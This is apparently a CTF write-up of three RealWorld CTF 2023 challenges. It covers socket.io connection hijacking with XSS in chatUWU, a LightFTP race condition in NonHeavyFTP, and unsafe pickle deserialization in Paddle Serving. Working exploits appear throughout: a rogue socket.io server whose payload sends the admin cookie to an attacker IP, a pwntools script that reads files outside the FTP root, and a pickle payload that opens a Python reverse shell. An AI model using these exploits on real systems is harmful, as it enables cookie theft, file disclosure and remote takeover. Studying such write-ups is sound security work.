RealWorld CTF 2023 Writeup

Another writeup for the ReadWorld 2023 CTF. Here are the baby-level and normal-level challenges, but they are actually not easy at all.

All the challenges can be found here: https://github.com/chaitin/Real-World-CTF-5th-Challenges

Category	Challenge	Comment
Web	chatUWU	socket.io, connection hijacking, XSS
Pwn	NonHeavyFTP	LightFTP, race condition
	Paddle	pickle unserialize vuln
	tinyvm

Web

chatUWU

I can assure you that there is no XSS on the server! You will find the flag in admin's cookie.

This challenge is a socket.io-based chat room. As they provided a place to submit a link and request the admin bot to visit, we could suspect that there is an XSS or CSRF vulnerability on the client side.

However, I checked the admin bot page and found the URL must start with http://47.254.28.30:58000/, indicating that the CSRF might not be the case.

The logic behind the char room is quite simple and covered by the following code:

We could find that only two parameters are allowed: nickname and room, and if we set the room as DOMPurify, the content would be displayed as item.innerHTML. Otherwise, our content would be treated as plain text. However, even though our input can be treated as the HTML code, it would be sanitized by the DOMPurify function first on the server side.

Vulnerable DOMPurify?

Then I check the implementation of the DOMPurify function within the isomorphic-dompurify package used on the server side. Unfortunately, it is just a wrapper of the DOMPurifyfor use in the backend like nodejs. And currently, there is no known vulnerability (mutated XSS payloads) working anymore on the current version of DOMPurify.

Since we couldn't find an obvious vulnerability in the application layer, we might need to dive into other layers, for example, its dependency packages. And since we focus more on the client side, will there be a 0-day vulnerability within the socket.io client side?

fuzz client-side with radamsa?

Sometimes, it is hard to find a vulnerability related to parsing or data processing within the complex code base. Fuzz testing on the parameters might always be a good start.

Radamsa , claimed as a general-purpose fuzzer, does a great job in generating test data. So we could use this tool to generate arbitrary non-sense input data that might not be correctly handled by the implementation and run into an unintended behavior. Then, we could follow its pattern and custom a dedicated malicious payload for attacking.

However, our target code is the client-side code, so we can't leverage the web application fuzzer like ffuf which only monitors the response from the server. We need to monitor the browser/client-side code behavior of our input. It sounds difficult to test as well.

// generate inputs
echo 'guest' | radamsa -n 10 -o ./fuzz-samples/%n.txt

0-day vulnerability within socket.io client: wrong regex parsing

To be honest, I don't know how other players find out that we could add @ in the URL and trick the client into connecting to other hosts. But there are errors pop up if we add @ to the nickname parameters, and it seems like trying to reach out to another socket server.

Here is a quote from the challenge solver:

we were thinking about ways to hijack the connection so we looked at what happens to arguments we can control and saw that the parse function references beeing imported from https://github.com/galkn/parseuri, and that repo has an open issue mentioning a security vuln so we focused our attention on said function
I dont think that fuzzing is needed for such a small codebase, and as @[Sauercloud] WhoNeedsSleep already said we had an intuition that tricking the bot into connecting to our server would be neccessary so this line where the url is just passed to socket.io was a good starting point to look for a potential flaw

The vulnerable part can be traced from the client side to the URL parsing part.

However, the above CORS policy violation is caused by the browser setting, and I assume that the admin's request wouldn't have such a CORS security policy adopted. For testing locally, I use a CORS browser extension to allow CORS temporarily.

From this point, we could set up a fake web socket server and add the following XSS payload to get the admin's cookie.

const app = require('express')();
const http = require('http').Server(app);
const io = require('socket.io')(http, {cors: {"origin": "http://47.254.28.30:58000"}});

const hostname = process.env.HOSTNAME || '0.0.0.0';
const port = process.env.PORT || 8000;
const rooms = ['textContent', 'DOMPurify'];

app.get('/', (req, res) => {
    console.log("[+]Wow! We got the flag: " + req.query.flag);
});

io.on('connection', (socket) => {
    console.log('admin has connected to this sever!');
    let {nickname, room} = socket.handshake.query;
    socket.join(room);
    io.to(room).emit('msg', {
        from: 'guest',
        // text: `${nickname} has joined the room`
        text: '<img src=x onerror=\"this.src=\'http://xxx.xxx.xxx.xxx:xxx/?\'+document.cookie;\"></img>',
        isHtml: true
    });
});

http.listen(port, hostname, () => {
    console.log(`ChatUWU server running at http://${hostname}:${port}/`);
});

To sum up, this challenge gives a sight that as attackers, besides considering XSS on the client side and vulnerability on the server-side code, we could also think about connect hijacking, which means serving as the third party to impersonate the client or the server and get the data we want.

And, on the client side, we also need to debug the code that processes the server response or the client input.

Pwn

NonHeavyFTP

A non-heavy FTP for you.

This pwn challenge, labeled as "baby-level," was not as straightforward as anticipated. The provided binary is a version 2.2 of LightFTP, which at the time of the challenge had no known vulnerabilities.

It is important to note that the FTP protocol uses "\r\n" as a delimiter, so when attempting to connect to the server, it is necessary to use "nc -C" or an FTP command as the client.

I initially suspected that the vulnerability might be a path traversal within FTP commands, as the flag file, "flag.uuid," was located in the root path of "/" and the root file system path of the FTP server was "/server/data/". After reviewing the source code of the implementation of each command, I discovered that all file paths were first handled by "fspathtools.c" and then tested by the "lstat(text, &filestats) == 0" statement.

To exploit this, I wrote a fuzzer and locally sent payloads from this dictionary within the "LIST" command to the server, but none were able to bypass the "lstat" test after being processed by "fspathtools.c."

Upon further examination of the source code, I noticed that the server heavily utilized multi-thread programming to handle client connections. Once a client connects to the server's socket, a thread is created, and each thread makes use of the FTPCONTEXT structure.

typedef struct _FTPCONTEXT {
    pthread_mutex_t     MTLock;
    SOCKET              ControlSocket;
    SOCKET              DataSocket;
    pthread_t           WorkerThreadId;
    /*
     * WorkerThreadValid is output of pthread_create
     * therefore zero is VALID indicator and -1 is invalid.
     */
    int                 WorkerThreadValid;
    int                 WorkerThreadAbort;
    in_addr_t           ServerIPv4;
    in_addr_t           ClientIPv4;
    in_addr_t           DataIPv4;
    in_port_t           DataPort;
    int                 File;
    int                 Mode;
    int                 Access;
    int                 SessionID;
    int                 DataProtectionLevel;
    off_t               RestPoint;
    uint64_t            BlockSize;
    char                CurrentDir[PATH_MAX];
    char                RootDir[PATH_MAX];
    char                RnFrom[PATH_MAX];
    char                FileName[2*PATH_MAX];
    gnutls_session_t   TLS_session;
    SESSION_STATS       Stats;
} FTPCONTEXT, *PFTPCONTEXT;

Due to the out-of-bound transmission nature of the FTP protocol, when handling file-related commands, the server uses another port to send the file or data to the client. The modes for this are "Passive" and "Active," which respectively set up the connection from the client to server and from server to client. In LightFTP's implementation, after validating the file path, the server forks another thread for sending data.

For example, when handling the "LIST" command, the server first processes and validates the file path, obtains the thread mutex lock, and creates a thread for sending the data.

int ftpLIST(PFTPCONTEXT context, const char *params)
{
   struct	stat	filestats;
   pthread_t		tid;

   if (context->Access == FTP_ACCESS_NOT_LOGGED_IN)
       return sendstring(context, error530);
   if (context->WorkerThreadValid == 0)
       return sendstring(context, error550_t);

   if (params != NULL)
   {
       if ((strcmp(params, "-a") == 0) || (strcmp(params, "-l") == 0))
           params = NULL;
   }

   ftp_effective_path(context->RootDir, context->CurrentDir, params, sizeof(context->FileName), context->FileName);

   sendstring(context, context->FileName);

   while (stat(context->FileName, &filestats) == 0)
   {
       if ( !S_ISDIR(filestats.st_mode) )
           break;

       sendstring(context, interm150);
       writelogentry(context, " LIST", (char *)params);
       context->WorkerThreadAbort = 0;

       pthread_mutex_lock(&context->MTLock);

       context->WorkerThreadValid = pthread_create(&tid, NULL, (void * (*)(void *))list_thread, context);
       if ( context->WorkerThreadValid == 0 )
           context->WorkerThreadId = tid;
       else
           sendstring(context, error451);

       pthread_mutex_unlock(&context->MTLock);

       return 1;
   }

   return sendstring(context, error550);
}

race condition vulnerability

Upon deeper analysis, a race condition vulnerability was discovered in the list_thread function. It is important to focus on variables that are shared between threads and that do not correctly obtain a mutex lock when considering a race condition vulnerability.

In LightFTP, it is clear that the context variable is shared among the data and command connection thread within a client thread. In the list_thread function, it is observed that the Filename field of the context is used as the directory path, and in the ftpUSER function, which handles the USER command, the Filename field is set without obtaining a thread lock. This leads to a race condition vulnerability.

To exploit this vulnerability, the goal is to execute the code in the following sequence: Create the list thread -> handle the USER command and set the Filename field -> open the file path saved in the Filename field and send the content back to the client.

To achieve this, we can use the PASV mode to delay the list thread. In PASV mode, the server opens a socket as the data channel and sends a port to the client to wait for connection from the client side. This allows us to delay the list thread and send a USER name with our malicious file path.

The following is an example exploit script that takes advantage of the race condition vulnerability described above:

from pwn import *
from sys import *
import re

IP = "47.89.253.219"
PORT = 2121

sh = remote(IP, PORT)

def log_in():
    print(sh.recvline())

    sh.send(b'USER anonymous' + b'\r\n')
    print(sh.recvline())
    sh.send(b'PASS anonymous' + b'\r\n')
    print(sh.recvline())

def main():
    log_in()

    ### Enter the PASV mode
    sh.send(b'PASV' + b'\r\n')
    SearchObj = re.search('\d{0,3}\,\d{0,3}\)', sh.recvline().decode('utf-8')) # 227 Entering Passive Mode (127,0,0,1,199,42).
    data_port = int(SearchObj.group().split(',')[0]) * 256 + int(SearchObj.group().split(',')[1].strip(')')) # hex format of port 199*256+42

    ### Enter the LIST command
    sh.send(b'LIST /' + b'\r\n')
    sh.recvline()

    ### Delay the data connection
    ### Send the USER command to overwrite the Filename field
    sh.send(b'USER /../../../../../../' + b'\r\n')
    sh.recvline()

    # ### Second round
    # sh.send(b'RETR /hello.txt' + b'\r\n')
    # sh.recvline()
    # sh.send(b'USER /../../../../../../flag.deb10154-8cb2-11ed-be49-0242ac110002'+ b'\r\n')
    # sh.recvline()

    ### Set up the data connection to previous socket
    data_conn = remote(IP, data_port)
    print("[*] Wow! Loook what we received: %s" % data_conn.recv())


if __name__ == "__main__":
    main()

Paddle

Flexible to serve ML models, and more.

The paddle challenge provides a web server (the official example of paddle paddle) for remote model inference. Since it is another clone-and-pwn challenge, we could build our own docker container and debug the server to find an exploit to use.

In the testing code, two methods for requesting the server and retrieving the model inference result were found: RPC and HTTP.

# test_uci_pipeline.py
    # The example code for rpc client
    def predict_pipeline_rpc(self, batch_size=1):
        # 1.prepare feed_data
        feed_dict = {'x': '0.0137, -0.1136, 0.2553, -0.0692, 0.0582, -0.0727, -0.1583, -0.0584, 0.6283, 0.4919, 0.1856, 0.0795, -0.0332'}

        # 2.init client
        client = PipelineClient()
        client.connect(['127.0.0.1:9998'])

        # 3.predict for fetch_map
        ret = client.predict(feed_dict=feed_dict)
        # 4.convert dict to numpy
        result = {"prob": np.array(eval(ret.value[0]))}
        return result

    def predict_pipeline_http(self, batch_size=1):
        # 1.prepare feed_data
        data = '0.0137, -0.1136, 0.2553, -0.0692, 0.0582, -0.0727, -0.1583, -0.0584, 0.6283, 0.4919, 0.1856, 0.0795, ' \
               '-0.0332'
        feed_dict = {"key": [], "value": []}
        feed_dict["key"].append("x")
        feed_dict["value"].append(data)

        # 2.predict for fetch_map
        url = "http://127.0.0.1:18082/uci/prediction"
        r = requests.post(url=url, data=json.dumps(feed_dict))
        # 3.convert dict to numpy array
        result = {"prob": np.array(eval(r.json()["value"][0]))}
        return result

However, I didn't find a vulnerability during the competition. After the competition, it was revealed that there was an unsafe pickle unserialization vulnerability in the server.

Pickle is not safe

It was discovered that the server used pickle to load bytes from the request.tensors field without any sanitization. Pickle is not a secure package and should never be used to unserialize untrusted data.

So, I tried to construct an HTTP request and filled the tensors field as our payload, which is something that looks like:

my_payload = {
        "key": [],
        "value": [],
        "tensors": [b'xxxxxx'] # -> [{'xxx': b'xxxxxx'}]
}

But it always returns the {"error":"json: cannot unmarshal string into Go value of type map[string]json.RawMessage","code":3,"message":"json: cannot unmarshal string into Go value of type map[string]json.RawMessage","details":[]} error and not even reach to any breakpoint. It took me a lot of time to search online about the correct way to use the tensors field, but there is nothing.

Finally, I found that if we add an {} outside the b'xxxxxx', then we are able to reach the vulnerable function at least. After adjusting the field from debugging the function, I could write the following exploit.

from paddle_serving_server.pipeline import PipelineClient
import numpy as np
import pickle
import requests
import json

def generate_payload(cmd):

    class PickleRCE(object):
        def __reduce__(self):
            # import os
            # return os.system, (cmd,)
            import subprocess
            return subprocess.getoutput, (cmd,)

    obj = {"x": PickleRCE()}
    payload = pickle.dumps(obj)
    print(payload)
    return payload

def predict_pipeline_http():
    my_payload = {
        "key": [],
        "value": [],
        "tensors": [
            {
                "elem_type": 13,
                "byte_data": [
                    x for x in generate_payload('python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",xxxx));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")\'')
                    # x for x in generate_payload('sleep 10')
                ],
                "shape": [1]
            }
        ]
        }

    url = "http://47.88.23.73:39200/uci/prediction"
    r = requests.post(url=url, data=json.dumps(my_payload))

    return r.text


if __name__ == "__main__":
    print(predict_pipeline_http())

I also asked one of the very few members who completed this challenge during the competition about how he/she figured out where the vulnerability is and how he/she constructed the attack payload, especially the tensors field part (cause there is no example showing what does the field should look like). Here is the reply:

I just figured it out by reading through paddle's source via exec'ing into the docker container
I was trying to figure out how the input got transformed to the format in the HTTP request into the format used by simple_web_service
And after tracing it backwards for a while I found the part where it parses tensors and noticed the pickle case ¯_(ツ)_/¯

So, what we could learn from this:

we should debug the program if we are access to the source code
Searching for vulnerable function calls (such as pickle or eval-like calls) and checking for a dataflow from user input to the sink can uncover vulnerabilities.
Always pay attention to the data parsing part, which is more likely to have problems than the main functionality.

Web

chatUWU

Pwn

NonHeavyFTP

Paddle

tinyvm